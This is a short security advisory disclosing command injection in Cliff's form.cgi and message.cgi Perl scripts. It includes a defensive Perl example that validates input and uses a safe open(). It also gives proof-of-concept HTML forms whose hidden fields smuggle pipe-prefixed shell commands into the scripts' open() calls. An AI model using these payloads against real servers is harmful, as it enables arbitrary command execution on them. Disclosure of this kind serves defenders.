suid@suid.kg - mini advisory - Cliff's Form Mailer and Message board CGIs

Software: 	form.cgi and message.cgi 
URL:		http://www.shavenferret.com/scripts/form/
URL:		http://www.shavenferret.com/scripts/message/
Version:	Version 1.0
Platforms:	Unix
Type:		Input validation problem

Summary:

	Anyone can execute any command on the remote system with
	the privileges of the web server.

Vulnerability:

	The Perl code does no input validation and performs an
	open() on user-supplied input.
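
	The open() pattern described above next to a hardened form, as an
	added example that is not code from form.cgi or message.cgi. It
	assumes the parameter is meant to name a file under one fixed
	directory; $BASE_DIR, safe_name and open_response are hypothetical.

```perl
#!/usr/bin/perl
# Added example; not taken from form.cgi or message.cgi.
use strict;
use warnings;
use File::Spec;

# Assumption: the parameter names a file under one fixed directory.
my $BASE_DIR = '/var/www/data/responses';    # hypothetical path

# Allow-list check: accept only a plain file name, reject everything else.
# \A and \z anchor the whole string, so a trailing newline is rejected too.
sub safe_name {
    my ($value) = @_;
    return undef unless defined $value;
    # Letters, digits, '_', '-', '.'; 1 to 64 chars; no leading dot.
    return $1 if $value =~ /\A([A-Za-z0-9_-][A-Za-z0-9_.-]{0,63})\z/;
    return undef;
}

# Before (the pattern the advisory describes): two-argument open() lets
# the string itself choose the mode, so a leading or trailing '|' makes
# Perl run the rest as a command instead of opening a file.
#   open(FILE, $value);

# After: validated name, fixed directory, explicit '<' mode. With
# three-argument open() the third argument is only ever a path.
sub open_response {
    my ($value) = @_;
    my $name = safe_name($value);
    die "rejected parameter\n" unless defined $name;
    my $path = File::Spec->catfile($BASE_DIR, $name);
    open(my $fh, '<', $path) or die "cannot open $path: $!\n";
    return $fh;
}

# Constructed sample inputs, run through the validator only.
for my $input ('thanks.html', '| id', ' | id |', '../../etc/passwd', "a\nb") {
    my $verdict = defined safe_name($input) ? 'accepted' : 'rejected';
    (my $shown = $input) =~ s/\n/\\n/g;
    printf "%-22s %s\n", "'$shown'", $verdict;
}
```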

Exploits:

	(1) form.cgi

	Build an HTML form resembling:

	<form action=/cgi-bin/form.cgi method=post>

		<!-- heres the little sucker -->
		<input type=hidden name=response value="| <cmd to exec>">

		<input type=hidden name=email value="suid@suid.edu">
		<input type=hidden name=name value="name">
 		<input type=hidden name=subject value=x>
 		<input type=submit>
	</form>       

	(2) message.cgi

	<form action=/cgi-bin/message.cgi method=post>
		<input type="hidden" name="name" value="X">
		<input type="hidden" name="email" value="X@X.X">
		<input type="hidden" name="subject" value="X">
		<input type="hidden" name="body" value="X">
		<input type="hidden" name="song" value="">
		<input type="hidden" name="icon" value="X">
		<input type="hidden" name="email_reply" value="no">
		<input type="hidden" name="history" value="">
	<!-- here tis -->
		<input type="hidden" name="forum" 
		value=" | <command goes here> |">
	<!-- hmm -->

		<input type="hidden" name="required" value="0">
		<input type="hidden" name="reply" value="no">
		<input type="hidden" name="action" value="new_message">
		<input type="submit">
	</form>

	Of course you could simply send this in a POST request directly
	to the web server. Whatever.


http://www.suid.edu/advisories/006.txt

EOF